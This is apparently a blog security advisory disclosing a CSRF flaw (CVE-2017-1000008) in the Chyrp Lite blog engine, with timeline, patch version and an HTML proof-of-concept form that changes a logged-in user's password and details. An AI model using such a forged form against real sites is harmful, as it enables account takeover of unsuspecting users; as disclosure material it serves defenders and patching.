Security Advisory – Cross Site Request Forgery in Chyrp Lite

Product: Chyrp Lite
Vendor: Open source community
Version: 2016.04 “Lago” and earlier
Category: Cross site request forgery (CSRF)
Vendor Notified: 2017-01-05
Patched: 2017-01-06
Disclosed: 2017-03-06
Researcher(s): Carl Pearson
CVE: CVE-2017-1000008

A cross-site request forgery (CSRF) vulnerability exists in the user properites function of the Chyrp Lite blog engine. An unauthenticated remote attacker can exploit the vulnerability by tricking authenticated users into visiting a webpage under attacker control.

Proof of Concept
Example HTML attack form:

<!-- The form submits when this button is clicked. -->
<button onclick="document.csrf_form.submit()">Click to run</button>
<!-- Edit the 'action' attribute to reflect the IP address or hostname of the victim's Chyrp install. -->
<form name="csrf_form" id="csrf_form" method="POST" action="http://[host]/?action=controls">
	<input class="text" type="text" name="login" value="user" id="login" disabled="disabled"/>
	<input type="text" name="full_name" value="" id="full_name" tabindex="1"/>
	<input type="text" name="email" value="" id="email" tabindex="1"/>
	<input type="text" name="website" value="" id="website" tabindex="1"/>
	<input type="password" name="new_password1" value="apple" id="new_password1"/>
	<input type="password" name="new_password2" value="apple" id="new_password2"/>

If successful, an attacker can arbitrarily change the user’s password, email, and username to any desired values.

Chyrp Lite version 2017.01 “Swainson” patches this issue. Updating any existing Chyrp Lite installs is recommended.

Project home:
v2017.01 release notes:
OWASP CSRF overview:

Edit 7/13/17: CVE identifier added.


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.